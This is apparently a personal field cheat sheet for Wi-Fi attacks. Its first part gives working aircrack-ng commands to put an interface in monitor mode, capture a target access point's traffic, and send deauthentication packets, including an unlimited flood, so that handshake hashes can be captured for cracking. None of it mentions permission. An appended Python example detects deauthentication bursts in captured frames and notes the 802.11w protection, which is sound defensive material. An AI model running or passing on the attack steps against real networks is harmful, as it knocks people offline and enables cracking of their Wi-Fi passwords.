This is a little doc teaching you how to do wifi attacks. I always forget how to do it in the field, so here's a guide for when you're away from wifi. It's quick and keeps the info brief so you can reference it quickly. Every command here must be run as root.
We're going to assume wlan0 is the network interface you want to use. If you have time, read the man pages.
- Starting your receiver in monitor mode
    airmon-ng start wlan0
  When you're done, you can do:
    airmon-ng stop wlan0mon
- Capturing nearby networks
  Your wireless interface should be renamed to something along the lines of wlan0mon.
    airodump-ng -c 10 --bssid 00:1C:B3:09:85:15 wlan0mon
  -c 10 is the channel (if you don't know it, leave it out)
  --bssid 00:1C:B3:09:85:15 is the MAC of the access point (again, if you don't know it, leave it out)
  wlan0mon is the interface (you have to include this)
- Deauthentication
    aireplay-ng -b 00:1C:B3:09:85:15 -0 5 wlan0mon
  -b stands for bssid, which is the MAC of the access point you want to deauth
  -0 5 selects the deauthentication attack, and sends 5 deauth packets (set to 0 to send an unlimited number)
  wlan0mon is the interface
If your airodump says you've captured the hashes, you're good to go with cracking!
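
Seen from the defending side, the deauthentication step above shows up on the air as a burst of 802.11 deauthentication frames for one BSSID. The following is an added example, not part of the original guide: it parses radiotap-wrapped frames and flags such bursts. The function names, the 1-second window, the threshold of 5 and the sample frames are constructed assumptions.

```python
import struct
from collections import defaultdict

DEAUTH_FC0 = 0xC0  # frame control byte 0: version 0, type 0 (management), subtype 12 (deauth)

def parse_deauth(frame: bytes):
    """Return (dst, src, bssid, reason) for a radiotap-wrapped deauth frame, else None."""
    if len(frame) < 8:
        return None
    rt_len = struct.unpack_from("<H", frame, 2)[0]  # radiotap header length, little-endian
    dot11 = frame[rt_len:]
    if len(dot11) < 26 or dot11[0] != DEAUTH_FC0:
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    reason = struct.unpack_from("<H", dot11, 24)[0]  # reason code follows the 24-byte header
    return mac(dot11[4:10]), mac(dot11[10:16]), mac(dot11[16:22]), reason

def find_deauth_bursts(capture, window=1.0, threshold=5):
    """capture: iterable of (timestamp, frame). Returns {bssid: peak deauths per window}."""
    times = defaultdict(list)
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed:
            times[parsed[2]].append(ts)
    alerts = {}
    for bssid, stamps in times.items():
        stamps.sort(); start = best = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide the window forward
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:  # assumed threshold; tune against your own baseline
            alerts[bssid] = best
    return alerts

def sample_frame(dst, src, bssid, reason=7, fc0=DEAUTH_FC0):
    """Constructed test frame: 8-byte radiotap header + 802.11 header + reason code."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    radiotap = struct.pack("<BBHI", 0, 0, 8, 0)
    hdr = bytes([fc0, 0]) + b"\x00\x00" + raw(dst) + raw(src) + raw(bssid) + b"\x00\x00"
    return radiotap + hdr + struct.pack("<H", reason)

AP = "00:1c:b3:09:85:15"  # the BSSID used in the commands above
SAMPLE = [(10.0 + i * 0.1, sample_frame("ff:ff:ff:ff:ff:ff", AP, AP)) for i in range(6)]
SAMPLE.append((10.2, sample_frame("ff:ff:ff:ff:ff:ff", AP, AP, fc0=0x80)))  # beacon, ignored
SAMPLE.append((11.0, sample_frame("02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:02", 3)))

if __name__ == "__main__":
    print(find_deauth_bursts(SAMPLE))
```

Where the access point and its clients use Protected Management Frames (802.11w), clients discard unprotected deauthentication frames like these.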